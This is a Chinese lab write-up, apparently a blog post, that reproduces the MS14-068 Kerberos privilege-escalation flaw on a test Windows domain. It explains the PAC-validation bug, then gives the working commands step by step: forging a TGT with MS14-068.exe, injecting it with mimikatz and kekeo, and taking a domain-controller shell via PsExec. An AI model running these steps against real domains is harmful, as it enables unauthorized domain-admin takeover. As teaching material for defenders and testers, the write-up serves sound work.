随笔 - 13,  文章 - 0,  评论 - 0,  阅读 - 7137

0x00前言

MS14-068漏洞可以将域内任何一个普通用户提升至域管理员权限。微软给出的补丁是KB3011780,在server 2000以上的域控服务器中,只要没有添加这个补丁,都可引发极大的危害。

0x01漏洞复现

漏洞原理

服务票据是客户端直接发送给服务器,并请求服务资源,如果服务器没用向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。

漏洞利用前提

域控没有打ms14-068的补丁(KB3011780)

攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码或者hash,以及域用户的suid

环境搭建

域控制器(DC):win server2008 10.10.10.10

域内机器:win7 10.10.10.20

漏洞复现

查询域控机器是否存在该补丁

 systeminfo或者systeminfo  |findstr  "3011780"

TKmkaq.png

在win7上面使用普通域用户登录。
测试访问域控的C盘共享,访问被拒。

 dir  \\10.10.10.10\c$

TKJKVU.png

清空票据

 kerberos::purge   //清空已有票据
 kerberos::list    //查看票据

TKcaee.png

查看本机的用户ID

 whoami  /all

TKcWwQ.png

使用ms14-068.exe提权工具生成伪造的TGT票据

 MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

TKf94H.png

使用mimikatz写入TGT票据,

 kerberos::ptc TGT_test@test.com.ccache

TKfqIg.png

使用PSTools目录下的PsExec.exe获取shell,#psexec.exe以管理员权限运行连接域控

TMpRnf.png

使用kekeo工具
exploit::ms14068  /domain:test.com  /user:test  /password:123.com /ptt 

TK7RmR.png

攻击者如何利用该漏洞:

通过身份验证的域用户可以向Kerberos KDC发出伪造的Kerberos票证,声明该用户就是域管理员权限。Kerberos KDC在处理来自攻击者的请求时,会不恰当地验证伪造的票证签名,从而让攻击者能利用域管理员的身份来访问网络上的资源。

posted on   herbmint  阅读(828)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5
点击右上角即可分享
微信分享提示